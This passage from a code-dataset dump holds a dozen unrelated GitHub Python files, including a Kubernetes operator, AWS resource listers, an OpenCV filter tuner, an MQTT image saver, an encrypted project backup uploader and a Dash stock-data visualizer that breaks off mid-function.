| Galateos/edu_ramsomware | main.py | main.py | py | 2,593 | python | en | code | 1 | github-code | 50 |
19398309415 | import kopf
import kubernetes
@kopf.on.create('muge.net', 'v1', 'databases')
def create_fn(body, spec, meta, status, **kwargs):
    """Handle creation of a Database custom resource.

    Creates a Pod running the requested database image and a NodePort Service
    exposing it, both adopted as children of the Database object (so they are
    garbage-collected when the Database is deleted).

    Parameters
    ----------
    body : dict
        Full body of the Database object.
    spec : dict
        The object's spec; must contain 'type' ('mongo' or 'mysql'),
        may contain 'tag' (image tag, defaults to 'latest').
    meta, status : dict
        Object metadata / status (unused, required by the kopf signature).

    Returns
    -------
    dict
        Message that kopf stores on the object's status.
    """
    # Get info from Database object
    name = body['metadata']['name']
    namespace = body['metadata']['namespace']
    # Use .get() so a missing key does not raise KeyError before validation
    # (spec['tag'] crashed for objects that omitted the optional 'tag' field)
    db_type = spec.get('type')
    tag = spec.get('tag') or 'latest'
    # Make sure a supported type is provided
    if not db_type:
        raise kopf.HandlerFatalError(f'Type must be set. Got {db_type}.')
    if db_type not in ('mongo', 'mysql'):
        # Previously an unsupported type crashed later with UnboundLocalError on `port`
        raise kopf.HandlerFatalError(f'Type must be mongo or mysql. Got {db_type}.')
    # Pod template
    pod = {'apiVersion': 'v1', 'metadata': {'name': name, 'labels': {'app': 'db'}}}
    # Service template
    svc = {'apiVersion': 'v1', 'metadata': {'name': name},
           'spec': {'selector': {'app': 'db'}, 'type': 'NodePort'}}
    # Update templates based on Database specification
    image = f'{db_type}:{tag}'
    pod['spec'] = {'containers': [{'image': image, 'name': db_type}]}
    if db_type == 'mongo':
        port = 27017
    if db_type == 'mysql':
        port = 3306
        # NOTE(review): hard-coded root password; should come from a Secret
        pod['spec']['containers'][0]['env'] = [{'name': 'MYSQL_ROOT_PASSWORD', 'value': 'my_passwd'}]
    svc['spec']['ports'] = [{'port': port, 'targetPort': port}]
    # Make the Pod and Service the children of the Database object
    kopf.adopt(pod, owner=body)
    kopf.adopt(svc, owner=body)
    # Object used to communicate with the API Server
    api = kubernetes.client.CoreV1Api()
    # Create Pod
    obj = api.create_namespaced_pod(namespace, pod)
    print(f"Pod {obj.metadata.name} created")
    # Create Service
    obj = api.create_namespaced_service(namespace, svc)
    print(f"NodePort Service {obj.metadata.name} created, exposing on port {obj.spec.ports[0].node_port}")
    # Update status
    msg = f"Pod and Service created by Database {name}"
    return {'message': msg}
@kopf.on.delete('muge.net', 'v1', 'databases')
def delete(body, **kwargs):
    """Log deletion of a Database object.

    The child Pod / Service are removed by Kubernetes garbage collection,
    since `kopf.adopt` made them owned by the Database object at creation.
    """
    msg = f"Database {body['metadata']['name']} and its Pod / Service children deleted"
    return {'message': msg}
| ianmuge/kopf-test | operator/main.py | main.py | py | 1,939 | python | en | code | 0 | github-code | 50 |
39675483796 | # Just listing some resources with AWS's pagination
# while logging the API Calls from AWS
import boto3
import logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
def list_lambdas():
    """Print the name of every Lambda function in the account/region, using pagination."""
    client = boto3.client('lambda')
    paginator = client.get_paginator('list_functions')
    response_iterator = paginator.paginate(
        PaginationConfig={
            'PageSize': 50
        }
    )
    # Each page holds up to PageSize function records
    for response in response_iterator:
        for function in response['Functions']:
            print(function['FunctionName'])
def list_queues():
    """Print the URL of every SQS queue in the account/region, using pagination."""
    client = boto3.client('sqs')
    paginator = client.get_paginator('list_queues')
    request_iterator = paginator.paginate(
        PaginationConfig={
            'PageSize': 50
        }
    )
    for page in request_iterator:
        # 'QueueUrls' is omitted from the ListQueues response when there are
        # no queues, so fall back to an empty list instead of raising KeyError
        for queue_url in page.get('QueueUrls', []):
            print(queue_url)
def list_topics():
    """Print the ARN of every SNS topic in the account/region, using pagination."""
    client = boto3.client('sns')
    paginator = client.get_paginator('list_topics')
    # The SNS API does not support PageSize
    request_iterator = paginator.paginate()
    for page in request_iterator:
        for item in page['Topics']:
            print(item['TopicArn'])
def list_instances():
    """Print the instance id of every EC2 instance in the region, using pagination."""
    client = boto3.client('ec2')
    paginator = client.get_paginator('describe_instances')
    request_iterator = paginator.paginate(
        PaginationConfig={
            'PageSize': 50
        }
    )
    # DescribeInstances groups instances by reservation
    for page in request_iterator:
        for reservation in page['Reservations']:
            for instance in reservation['Instances']:
                print(instance['InstanceId'])
def lambda_handler(event, context):
    """Lambda entry point: list all resources of each supported type, logging API calls."""
    list_lambdas()
    list_queues()
    list_topics()
    list_instances()
| gelouko/useful-scripts | aws/list_frenzy.py | list_frenzy.py | py | 1,700 | python | en | code | 1 | github-code | 50 |
1165190937 | import pygame
class Unit:
    """A movable 10x10 square unit rendered in the game window.

    The unit glides from its current coordinates toward a target position,
    advancing at most `velocity` pixels per axis on each move() call.
    """

    def __init__(self, x, y, color):
        """Create a unit at (x, y), initially targeting its own position.

        x, y  : the unit's coordinates within the game window
        color : the unit's draw color
        """
        self.x = x
        self.x_target = x
        self.y = y
        self.y_target = y
        self.velocity = 1
        self.body = (self.x, self.y, 10, 10)
        self.color = color
        self.rect = None

    def draw(self, window):
        """Render the unit onto the given game window."""
        self.rect = pygame.draw.rect(window, self.color, self.body)

    def move(self):
        """Advance one step toward the target position, then refresh display state."""
        self.x = self._step(self.x, self.x_target)
        self.y = self._step(self.y, self.y_target)
        self.update()

    def _step(self, current, target):
        """Return `current` moved at most one velocity step toward `target`."""
        # Snap to the target when closer than one step, to avoid overshooting
        if abs(target - current) < self.velocity:
            return target
        if target < current:
            return current - self.velocity
        if target > current:
            return current + self.velocity
        return current

    def update(self):
        """Refresh the unit's drawable body rectangle from its coordinates."""
        self.body = (self.x, self.y, 10, 10)

    def get_unit_position(self):
        """Return the unit's target position as [x_target, y_target]."""
        return [self.x_target, self.y_target]
# Updates the unit's target positioin.
# target_position = the position this unit is moving to
#
def update_unit_target_position(self, target_position):
self.x_target = target_position[0]
self.y_target = target_position[1] | abmarney/rts-pub | unit.py | unit.py | py | 1,747 | python | en | code | 0 | github-code | 50 |
74269272475 | import cv2
import numpy as np
import configparser
from configparser import SafeConfigParser
def frame_change(pos):
    """Trackbar callback: record the requested frame index and flag a refresh."""
    global posicao, new
    posicao = pos
    new = True
def sliders_update(val):
    """Trackbar callback: flag that filter parameters changed and a refresh is needed."""
    global new
    new = True
def main():
    """Interactive HSV filter tuner: preview circle detection on a video and save settings."""
    # `posicao` and `new` are module-level state shared with the OpenCV trackbar
    # callbacks (frame_change / sliders_update). Without this declaration, main()
    # only reads its own locals, so the `if new:` refresh branch could never fire.
    global posicao, new
    config = configparser.ConfigParser()
    config.read('config.ini')
    arquivo = config['default']['video']
    font = cv2.FONT_HERSHEY_SIMPLEX
    posicao = 1
    new = False
    capture = cv2.VideoCapture(arquivo)
    _, image = capture.read()
    # Tile the first frame 2x2 so the window has its final layout from the start
    image_line1 = np.hstack((image, image))
    image_line2 = np.hstack((image, image))
    image = np.vstack((image_line1, image_line2))
    # Initial slider values come from the config file
    blur = int(config['default']['blur'])
    Bsize = int(config['default']['Bsize'])
    Hmin = int(config['default']['Hmin'])
    Hmax = int(config['default']['Hmax'])
    Smin = int(config['default']['Smin'])
    Smax = int(config['default']['Smax'])
    Vmin = int(config['default']['Vmin'])
    Vmax = int(config['default']['Vmax'])
    cv2.namedWindow("image")
    cv2.createTrackbar('Frame','image',0,int(capture.get(cv2.CAP_PROP_FRAME_COUNT)),frame_change)
    cv2.createTrackbar('Blur','image',blur,30,sliders_update)
    cv2.createTrackbar('Hmin','image',Hmin,100,sliders_update)
    cv2.createTrackbar('Hmax','image',Hmax,179,sliders_update)
    cv2.createTrackbar('Smin','image',Smin,255,sliders_update)
    cv2.createTrackbar('Smax','image',Smax,255,sliders_update)
    cv2.createTrackbar('Vmin','image',Vmin,255,sliders_update)
    cv2.createTrackbar('Vmax','image',Vmax,255,sliders_update)
    cv2.createTrackbar('Bsize','image',Bsize,50,sliders_update)
    # Radius window (in pixels) around Bsize for accepting a circular object
    rmin = Bsize - int(Bsize/3)
    rmax = Bsize + int(Bsize/3)
    while True:
        if new:
            new = False
            capture.set(cv2.CAP_PROP_POS_FRAMES, posicao)
            _, image_raw = capture.read()
            blur = int(cv2.getTrackbarPos('Blur', 'image'))
            if blur%2 == 0:
                blur += 1  # blur kernel size must be odd
            Hmin = int(cv2.getTrackbarPos('Hmin', 'image'))
            Hmax = int(cv2.getTrackbarPos('Hmax', 'image'))
            Smin = int(cv2.getTrackbarPos('Smin', 'image'))
            Smax = int(cv2.getTrackbarPos('Smax', 'image'))
            Vmin = int(cv2.getTrackbarPos('Vmin', 'image'))
            Vmax = int(cv2.getTrackbarPos('Vmax', 'image'))
            Bsize = int(cv2.getTrackbarPos('Bsize', 'image'))
            # (the original re-read Hmax a second time here; the duplicate was removed)
            # TODO: max must not be smaller than min for H, S and V
            image_blur = cv2.blur(image_raw, (blur, blur))
            image_hsv = cv2.cvtColor(image_blur, cv2.COLOR_BGR2HSV)
            image_thresh = cv2.inRange(image_hsv,np.array((Hmin, Smin, Vmin)), np.array((Hmax, Smax, Vmax)))
            image_thresh = cv2.blur(image_thresh,(blur, blur))
            try:
                rmin = Bsize - int(Bsize/3)
                rmax = Bsize + int(Bsize/3)
                print(rmin, rmax)
                # NOTE(review): rmin/rmax are computed but not passed to HoughCircles
                # (minRadius/maxRadius are hard-coded below) -- confirm intent.
                cir = cv2.HoughCircles(image_thresh,cv2.HOUGH_GRADIENT,1,200,
                                       param1=25,param2=25,minRadius=5,maxRadius=20)
                if cir is not None:
                    for i in cir:
                        for j in i:
                            if j[0] > 0:
                                cv2.circle(image_raw,(j[0],j[1]), int(j[2]), (255,255,0),5)
                                print(f'x={j[0]} \t y={j[1]}')
            except Exception as e:
                print('Exception: ', e)
            # On-screen key help
            cv2.putText(image_raw,'sair: q',(10,30), font, 1, (0, 0, 255), 2, cv2.LINE_AA)
            cv2.putText(image_raw,'reset: r',(10,90), font, 1, (0, 0, 255), 2, cv2.LINE_AA)
            cv2.putText(image_raw,'Salvar: s',(10,150), font, 1, (0, 0, 255), 2, cv2.LINE_AA)
            # Compose the 2x2 preview: raw+detections, blurred, threshold mask, blurred
            image_line1 = np.hstack((image_raw, image_blur))
            image_thresh = cv2.cvtColor(image_thresh, cv2.COLOR_GRAY2BGR)
            image_line2 = np.hstack((image_thresh, image_blur))
            image = np.vstack((image_line1, image_line2))
        cv2.imshow("image", image)
        key = cv2.waitKey(1) & 0xFF
        # r resets playback to the first frame
        if key == ord("r"):
            posicao = 1
            capture.set(cv2.CAP_PROP_POS_FRAMES, posicao)
            _, image = capture.read()
        elif key == ord('s'):
            # s saves the current slider values back to config.ini
            blur = int(cv2.getTrackbarPos('Blur', 'image'))
            if blur%2 == 0:
                blur += 1
            Hmin = int(cv2.getTrackbarPos('Hmin', 'image'))
            Hmax = int(cv2.getTrackbarPos('Hmax', 'image'))
            Smin = int(cv2.getTrackbarPos('Smin', 'image'))
            Smax = int(cv2.getTrackbarPos('Smax', 'image'))
            Vmin = int(cv2.getTrackbarPos('Vmin', 'image'))
            Vmax = int(cv2.getTrackbarPos('Vmax', 'image'))
            Bsize = int(cv2.getTrackbarPos('Bsize', 'image'))
            parser = SafeConfigParser()
            parser.read('config.ini')
            # NOTE(review): values are read from the 'default' section but saved
            # to 'atual', and 'Hmax' is never written -- confirm this is intended.
            parser.set('atual', 'blur', str(blur))
            parser.set('atual', 'Hmin', str(Hmin))
            parser.set('atual', 'Smin', str(Smin))
            parser.set('atual', 'Smax', str(Smax))
            parser.set('atual', 'Vmin', str(Vmin))
            parser.set('atual', 'Vmax', str(Vmax))
            parser.set('atual', 'Bsize', str(Bsize))
            with open('config.ini', 'w+') as configfile:
                parser.write(configfile)
        elif key == ord("q"):
            break
    cv2.destroyAllWindows()
if __name__ == '__main__':
main() | Atzingen/rastreador-pendulo | cmd_code/set_filters.py | set_filters.py | py | 5,550 | python | en | code | 0 | github-code | 50 |
72751883675 | import sys
##fonctions
def validation_arg(qte = 3, msg_usage = "script.py input output"):
if len(sys.argv) != qte:
print("Option illégale")
print("Usage: ", msg_usage)
sys.exit(-1)
def extraire_metaDonnees(fichier):
fh = open(fichier, "r")
valeur1, valeur2 = fh.readline().split()
fh.close()
return int(valeur1), int(valeur2)
def extraire_ds_dict(fichier):
dict = {}
for each in fichier:
elmt1, elmt2 = each.split()
dict[elmt1] = elmt2
return dict
def lectureAdict(fichier):
fh = open(fichier, "r")
#nb_seq, taille_seq = extraire_metaDonnees(fh)
next(fh)
dict = extraire_ds_dict(fh)
fh.close()
return dict
def impressionDict(dict, out = "std"):
for nom, valeur in dict.items():
print(nom, valeur, file = out) #Permet de ne garder qu'un seul saut de ligne à chacune des
def ecriture(fichier, contenu):
fh = open(fichier, "w")
impressionDict(contenu, fh)
print("écriture terminée")
##Processus
validation_arg()
nb_seq, taille_seq = extraire_metaDonnees(sys.argv[1])
sequences = lectureAdict(sys.argv[1])
print(nb_seq, taille_seq)
print(sequences)
ecriture(sys.argv[2], sequences)
print("\nFin de script")
| AnneMay/DESS-bioinfo | INF8212/cp_dict.py | cp_dict.py | py | 1,230 | python | fr | code | 0 | github-code | 50 |
1376070763 | import math
TickSize = .01 # change it to .1 for illiquid stocks
LotSize = 100
OptionSize = 100
M = 10 # max round lots for holding
K = 5 # max round lots for each trading action
H = 5 # mean reversion half life
S0 = 50
Lambda = math.log(2) / H
theta = .5
sigma = .1
sigma_dh = .01
kappa = 1e-4
kappa_dh = .1
alpha = .02
factor_alpha = -.01
factor_sensitivity = .5
factor_sigma = .12
p_e = 50
| sophiagu/RLF | gym-rlf/gym_rlf/envs/Parameters.py | Parameters.py | py | 395 | python | en | code | 7 | github-code | 50 |
25971216929 | #!/usr/bin/env python3
import paho.mqtt.client as mqtt
import uuid
import sys
LOCAL_MQTT_HOST="169.62.47.162"
LOCAL_MQTT_PORT=1883
LOCAL_MQTT_TOPIC="persist_faces"
def on_connect_local(client, userdata, flags, rc):
print("connected to local broker with rc: " + str(rc))
def on_message(client,userdata, msg):
try:
print("message received!")
print("Received message of len:{} bytes from topic:{}".format(len(msg.payload), msg.topic) )
# Publishing this message to the cloud broker
guid = str(uuid.uuid4())
msg = msg.payload
file_path = "/mnt/w251-homework3/" + "detect_faces" + guid + ".png"
with open(file_path, 'wb') as outfile:
outfile.write(msg)
except:
print("Unexpected error:", sys.exc_info()[0])
local_mqttclient = mqtt.Client()
local_mqttclient.on_connect = on_connect_local
local_mqttclient.connect(LOCAL_MQTT_HOST, LOCAL_MQTT_PORT, 60)
local_mqttclient.subscribe(LOCAL_MQTT_TOPIC, qos=2)
local_mqttclient.on_message = on_message
# go into a loop
local_mqttclient.loop_forever()
| sthiruvallur/face_detection_edge_to_cloud | cloud_src/cloud_persist_msg/persist_image.py | persist_image.py | py | 1,040 | python | en | code | 1 | github-code | 50 |
33002225914 | from django.urls import path
from . import views
urlpatterns = [
path('', views.myAccount),
path('registerUser/', views.registerUser, name='registerUser'),
path('login/', views.login, name='login'),
path('logout/', views.logout, name='logout'),
path('helloWorld/', views.helloWorld, name='helloWorld'),
] | moxex/yetti-tech | users/urls.py | urls.py | py | 326 | python | en | code | 0 | github-code | 50 |
40886710059 | n = f = 0
while True:
#numero inteiro
try:
n = int(input('Digite um número inteiro: '))
except Exception as ValueError:
print ('Número inteiro inválido. ', end='')
except Exeception as KeyboardInterrupt:
print ('O usuário preferiu não informar')
else:
break
while True:
#numero float
try:
f = float(input('Digite um número flutuante: '))
except Exception as ValueError:
print ('Número flutuante inválido. ', end='')
except Exeception as KeyboardInterrupt:
print ('O usuário preferiu não informar')
else:
break
print ('O número inteiro digitado foi {}'.format(n))
print ('O número flutuante digitado foi {}'.format(f))
| lucasclemerson/course-python | exercicios/exe113.py | exe113.py | py | 675 | python | pt | code | 0 | github-code | 50 |
25730093355 | from django.urls import path
from . import views
app_name = 'posts'
urlpatterns = [
path('', views.index, name='index'),
path('create/', views.create, name='create'),
path('<int:pk>', views.detail, name='detail'),
path('<int:pk>/update/', views.update, name='update'),
path('<int:pk>/delete/', views.delete, name='delete'),
path('<int:pk>/likes/', views.likes, name='likes'),
path('<int:pk>/reviews/', views.review_create, name='review_create'),
path('<int:review_pk>/delete', views.review_delete, name='review_delete'),
path('search/', views.search, name='search'),
path('<int:review_pk>/review_detail', views.review_detail, name='review_detail'),
] | myeonghwan57/Pair_project_01 | matdori/posts/urls.py | urls.py | py | 692 | python | en | code | 0 | github-code | 50 |
22351628247 | import urllib, io
from Tkinter import *
from PIL import Image, ImageTk
root = Tk()
fd = urllib.urlopen("http://www.google.com/images/srpr/logo11w.png")
imgFile = io.BytesIO(fd.read())
im = ImageTk.PhotoImage(Image.open(imgFile)) # <-- here
image = Label(root, image = im)
image.grid(row = 7, column = 1)
root.mainloop() | MBAustin/happy-birthday-dad | test_files/imageTest.py | imageTest.py | py | 324 | python | en | code | 0 | github-code | 50 |
35685315220 | import numpy as np
import matplotlib.pyplot as plt
fig, ax_lst = plt.subplots(1, 1)
x = np.linspace(0, 2, 100)
y = np.square(np.sin(x-2))*np.exp(-1*np.square(x))
plt.plot(x, y, label='f(x)')
plt.xlabel('x-axis')
plt.ylabel('y-axis')
plt.title('Exercise 10')
plt.legend()
plt.show() | wyfapril/CS6112017 | PythonExercises/exercise10.py | exercise10.py | py | 283 | python | en | code | 0 | github-code | 50 |
7466642366 | from config import timevert
from aiogram.types import ReplyKeyboardRemove, \
ReplyKeyboardMarkup, KeyboardButton, \
InlineKeyboardMarkup, InlineKeyboardButton
i = {
"бургерок": {"type": "food", "price": 95, "value": 50, "emoji": "🍔"},
"сочок": {"type": "food", "price": 40, "value": 30, "emoji": "🧃"},
"пестик": {"type": "tool", "price": 10500, "emoji": "🔫"},
"отрава": {"type": "tool", "price": 500, "value": 50, "emoji": "🏴☠️"},
"динамит": {"type": "tool", "price": 1200, "value": 50, "emoji": "🧨"},
"домик": {"type": "asset", "price": 100000, "emoji": "🏠"},
"холизавод": {"type": "asset", "price": 1000000, "emoji": "🏭"}
}
def shop(page):
if page == "shop_main":
btn_1 = InlineKeyboardButton(f"Еда 🍔", callback_data="shop_food")
btn_2 = InlineKeyboardButton(f"Штуки 🔫", callback_data="shop_tools")
btn_3 = InlineKeyboardButton(f"Активы 🏡", callback_data="shop_assets")
btn_4 = InlineKeyboardButton(f"Эмодзи 💖", callback_data="shop_emoji")
inline = InlineKeyboardMarkup().add(btn_1).add(btn_2).add(btn_3).add(btn_4)
if page == "shop_food":
btn_1 = InlineKeyboardButton(f"🍔\t\tбургерок\t\t💕{i['бургерок']['price']}", callback_data="buy_бургерок")
btn_2 = InlineKeyboardButton(f"🧃\t\tсочок\t\t💕{i['сочок']['price']}", callback_data="buy_сочок")
btn_3 = InlineKeyboardButton(f"🙅♂️\t\tназад", callback_data="shop_back")
inline = InlineKeyboardMarkup().add(btn_1).add(btn_2).add(btn_3)
if page == "shop_tools":
btn_1 = InlineKeyboardButton(f"🔫\t\tпестик\t\t💕{timevert(i['пестик']['price'])}", callback_data="buy_пестик")
btn_2 = InlineKeyboardButton(f"🏴☠️\t\tотрава\t\t💕{timevert(i['отрава']['price'])}", callback_data="buy_отрава")
btn_3 = InlineKeyboardButton(f"🧨\t\tдинамит\t\t💕{timevert(i['динамит']['price'])}", callback_data="buy_динамит")
btn_4 = InlineKeyboardButton(f"🙅♂️\t\tназад", callback_data="shop_back")
inline = InlineKeyboardMarkup().add(btn_1).add(btn_2).add(btn_3).add(btn_4)
if page == "shop_assets":
btn_1 = InlineKeyboardButton(f"🏠\t\tдомик\t\t💕{timevert(i['домик']['price'])}", callback_data="buy_домик")
btn_2 = InlineKeyboardButton(f"💒\t\tхолизавод\t\t💕{timevert(i['холизавод']['price'])}", callback_data="buy_холизавод")
btn_3 = InlineKeyboardButton(f"🏩\t\tотель\t\t💕(скоро)", callback_data="buy_отель")
btn_4 = InlineKeyboardButton(f"🙅♂️\t\tназад", callback_data="shop_back")
inline = InlineKeyboardMarkup().add(btn_1).add(btn_2).add(btn_3).add(btn_4)
if page == "shop_emoji":
btn_4 = InlineKeyboardButton(f"🙅♂️\t\tназад", callback_data="shop_back")
inline = InlineKeyboardMarkup().add(btn_4)
return inline
| marcoflacko/holy | shop.py | shop.py | py | 3,052 | python | en | code | 0 | github-code | 50 |
13114569053 | from dotenv import load_dotenv
from os import getenv, makedirs
from os.path import isdir
from shutil import rmtree
from datetime import datetime, timedelta, date
from collections import Counter
from multiprocessing import cpu_count
def get_uf_file(path_file):
"""
Retorna a UF a qual um arquivo é referente
"""
with open(path_file, encoding=get_encoding_files()) as readfile:
readfile.readline()
line = readfile.readline().replace('\n', '')
uf_file = line[-2:]
return uf_file
def get_encoding_files():
load_dotenv()
default_encoding = getenv('DEFAULT_ENCODING')
return default_encoding
def get_env(env_name):
load_dotenv()
default_encoding = getenv(env_name)
return default_encoding
def transform_line_write(list_values):
output_separator = getenv('OUTPUT_SEPARATOR')
line_write = f'{output_separator}'.join(list_values)
line_write += '\n'
return line_write
def create_directory(directory_name):
if isdir(directory_name):
rmtree(directory_name)
makedirs(directory_name)
def calc_average_values(list_values):
average = []
sum_values = 0
length_main_list = len(list_values)
if len(list_values) > 0:
length_sublists = len(list_values[0])
for index_sublist in range(length_sublists):
for index_main_list in range(length_main_list):
sum_values += format_float(list_values[index_main_list][index_sublist], default_value=0)
average.append(str(round(sum_values/length_main_list, 2)))
sum_values = 0
return average
else:
return []
def calc_average_values_forecast(list_values):
average = []
sum_values = 0
sum_values_string = []
length_main_list = len(list_values)
length_sublists = len(list_values[0])
for index_sublist in range(length_sublists):
for index_main_list in range(length_main_list):
if index_sublist == 0:
sum_values_string.append(list_values[index_main_list][index_sublist])
else:
sum_values += format_float(list_values[index_main_list][index_sublist], default_value=0)
if index_sublist == 0:
average.append(Counter(sum_values_string).most_common(1)[0][0])
sum_values_string.clear()
else:
average.append(str(round(sum_values/length_main_list, 2)))
sum_values = 0
return average
def format_float(value, default_value=None):
try:
return float(value)
except:
return default_value
def format_int(value):
try:
return int(value)
except:
return None
def convert_date_format(date_str, date_format='%Y/%m/%d'):
try:
new_date = datetime.strptime(date_str, date_format)
return new_date
except:
return None
def separate_date(date_str):
converted_date = convert_date_format(date_str)
if converted_date:
year = converted_date.year
month = converted_date.month
day = converted_date.day
return year, month, day
else:
return [None, None, None]
def get_competence(date_str, date_format='%d/%m/%Y', result_format='%Y/%m/%d'):
converted_date = convert_date_format(date_str, date_format)
if converted_date:
competence = converted_date.replace(day=1)
return competence.strftime(result_format)
else:
return None
def get_month(str_date):
converted_date = convert_date_format(str_date)
if converted_date:
return str(converted_date.month)
else:
return ''
def get_day(str_date):
converted_date = convert_date_format(str_date)
if converted_date:
return str(converted_date.day)
else:
return ''
def get_first_and_last_day_week(str_date):
converted_date = convert_date_format(str_date)
number_days = timedelta(days=converted_date.weekday() + 1)
if number_days.days == 7:
start = converted_date
end = start + timedelta(days=6)
else:
start = converted_date - timedelta(days=converted_date.weekday() + 1)
end = start + timedelta(days=6)
return str(start.strftime('%Y/%m/%d')), str(end.strftime('%Y/%m/%d'))
def get_number_free_threads():
"""
Retorna a metade da quantidade de theads disponíveis na maquina
"""
try:
return cpu_count()/2
except:
return 1
def are_valid_values(*args):
for value in args:
if value is None:
return False
return True
def is_date(value, format_date='%d/%m/%Y'):
try:
datetime.strptime(value, format_date)
return True
except:
return False
def is_valid_time(time):
try:
if str(time).isdigit():
if int(time) < 0 or int(time) > 23:
return False
else:
return True
else:
return False
except:
return False
def convert_time_days(value):
"""
Processa o horário do dia solicitado
"""
result = []
for sublist in str(value).split(','):
if '-' in sublist:
range_sublist = str(sublist).split('-')
if len(range_sublist) == 2:
init_range = range_sublist[0]
end_range = range_sublist[1]
if is_valid_time(init_range) and is_valid_time(end_range):
range_times = range(int(init_range), int(end_range)+1)
else:
return []
else:
return []
else:
range_times = [sublist]
for time in range_times:
if is_valid_time(time):
result.append(int(time))
else:
return []
result = list(set(result))
result.sort()
return result
def format_int_to_time(value):
string_time = f'{str(value).zfill(2)}:00:00'
# return datetime.strptime(string_time, '%H:%M:%S').time()
return string_time
def format_str_to_date(value):
return datetime.strptime(value, '%d/%m/%Y').date()
def get_future_day(number_of_days):
current_day = datetime.now()
future_day = current_day + timedelta(days=int(number_of_days))
return future_day.strftime('%d/%m/%Y')
def get_current_day():
current_day = datetime.now()
return current_day.strftime('%d/%m/%Y')
def question_user(message, limit_response=None, response_is_dir=False, int_response=False):
option = ''
while not option:
if limit_response:
response = input(f'{message} => ')
if int_response:
response = format_int(response)
if response in limit_response:
option = response
else:
print('Informe uma opção válida!')
elif response_is_dir:
response = input(f'{message} => ')
if isdir(response):
option = response
else:
print('Informe um caminho válido!')
elif int_response:
response = input(f'{message} => ')
if format_int(response):
option = format_int(response)
else:
print('Informe um valor válido válido!')
else:
option = input(f'{message} => ')
break
return option
| marcoswb/brazilian-climatology | utils/functions.py | functions.py | py | 7,367 | python | en | code | 0 | github-code | 50 |
31634699775 | try:from .internetBytesIO import *
except ImportError: from internetBytesIO import *
from Crypto.PublicKey import RSA
from Crypto.Random import get_random_bytes
from Crypto.Cipher import AES, PKCS1_OAEP
import os, subprocess
def getBackupAccount():
f=open(os.path.join(BASE_DIR_PATH, "data", "backupAccount"), "r")
jso = f.read()
f.close()
return jso
account = getBackupAccount()
m=mega_from_json(json.loads(account))
megafs_folder = m.find('megafs')
def encrypt_for_backup(data):
file_out = BytesIO()
recipient_key = RSA.import_key(open( os.path.join(BASE_DIR_PATH, "data", "publickey.crt") ).read())
session_key = get_random_bytes(16)
# Encrypt the session key with the public RSA key
cipher_rsa = PKCS1_OAEP.new(recipient_key)
enc_session_key = cipher_rsa.encrypt(session_key)
# Encrypt the data with the AES session key
cipher_aes = AES.new(session_key, AES.MODE_EAX)
ciphertext, tag = cipher_aes.encrypt_and_digest(data)
[ file_out.write(x) for x in (enc_session_key, cipher_aes.nonce, tag, ciphertext) ]
file_out.seek(0)
return file_out
def zipThisBitch(extra=None):
print("Backing up files")
lst = [os.path.join(BASE_DIR_PATH, f) for f in os.listdir(BASE_DIR_PATH) if f!="img_mount_point"]
p = subprocess.Popen(["zip", "-r", "-"]+lst,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
zipped = encrypt_for_backup(p.stdout.read())
while True:
try: return m.upload(str(time.ctime()) +(extra if extra is not None else "")+".zip", megafs_folder[0], byteio=zipped)
except Exception as e: print("Backing up err",e)
# file = m.upload("megafs/wow.txt", folder[0], byteio=BytesIO(b"asdf")) | HeronErin/hermesfs | src/backupUtils.py | backupUtils.py | py | 1,645 | python | en | code | 0 | github-code | 50 |
23646206849 | import numpy as np
import pandas as pd
import plotly.graph_objects as go
import dash_core_components as dcc
import dash_html_components as html
from jupyter_dash import JupyterDash
from plotly.subplots import make_subplots
from dash.dependencies import Input, Output
from visualizers import BaseVisualizer
class AssetDebtVisualizer(BaseVisualizer):
def __init__(self, stock_id):
super(AssetDebtVisualizer, self).__init__()
self.load_stock_info()
self.stock_id = stock_id
self.company_name = self.stock_info[self.stock_info.code ==
stock_id].name.values[0]
self.company_type = self.stock_info[self.stock_info.code ==
stock_id].company_type.values[0]
self.data = self.create_df(stock_id)
self.features = self.data.columns[1:]
def create_df(self, stock_id):
df = pd.read_csv(
f"{self.root}/asset_debt/{self.company_type}_asset_debt.csv",
header=[0, 1])
df = df[df[('year', 'code')] == stock_id]
del df[('year', 'code')]
data_all = []
seasons = np.unique([col[0] for col in df.columns])
features = [col[1] for col in df.columns if col[0] == seasons[0]]
col_names = ['季'] + [col for col in features]
for feature in features:
selected_columns = [(season, feature) for season in seasons]
df1 = df[selected_columns]
df1.columns = df1.columns.droplevel(1)
data_all.append(df1.T)
data_all = pd.concat(data_all, axis=1).astype(float).reset_index()
data_all.columns = col_names
return data_all
def run_dash(self):
pbr = '每股參考淨值'
share_capital = '股本'
asset_debt_table = self.plot_table(self.data.drop(columns=[pbr, share_capital]))
one_line_plot = make_subplots(rows=3,
cols=1,
subplot_titles=('負債比率', pbr, share_capital),
shared_xaxes=True)
one_line_plot.append_trace(go.Scatter(
x=self.data['季'],
y=100 * (self.data['負債總額'] / self.data['資產總額']).values.reshape(-1),
mode='lines+markers'),
row=1,
col=1)
one_line_plot.append_trace(go.Scatter(
x=self.data['季'],
y=self.data[pbr].values.reshape(-1),
mode='lines+markers'),
row=2,
col=1)
one_line_plot.append_trace(go.Scatter(
x=self.data['季'],
y=(self.data[share_capital]/10000).values.reshape(-1),
mode='lines+markers'),
row=3,
col=1)
one_line_plot.update_yaxes(title_text='%', row=1, col=1)
one_line_plot.update_yaxes(title_text='$NTD', row=2, col=1)
one_line_plot.update_yaxes(title_text='$NTD 萬', row=3, col=1)
one_line_plot.update_layout(showlegend=False)
app = JupyterDash(__name__)
app.layout = html.Div([
html.H1(f'{self.stock_id} {self.company_name}',
style=self.title_style),
dcc.Graph(id='asset_debt_line_plot',
style={
'width': '900px',
'height': '80%',
'text-align': 'center'
}),
dcc.Checklist(id='checkbox',
options=[{
'label': self.features[i],
'value': i
} for i in range(len(self.features))
if self.features[i] != pbr and self.features[i] != share_capital],
value=[
i for i in range(len(self.features))
if self.features[i] != pbr and self.features[i] != share_capital
],
style={
'width': '900px',
'text-align': 'center'
}),
dcc.Graph(figure=one_line_plot,
style={
'width': '900px',
'height': '10%',
'text-align': 'center'
}),
html.Div(
[asset_debt_table],
style={
'width': '900px',
'text-align': 'center',
'marginTop': '50px',
'marginBottom': '50px'
})
],
style=self.main_div_style)
@app.callback(Output('asset_debt_line_plot', 'figure'),
[Input('checkbox', 'value')])
def update_line_chart(contents):
features = [self.features[i] for i in contents]
fig = go.Figure()
for col in features:
fig.add_trace(
go.Scatter(x=self.data['季'],
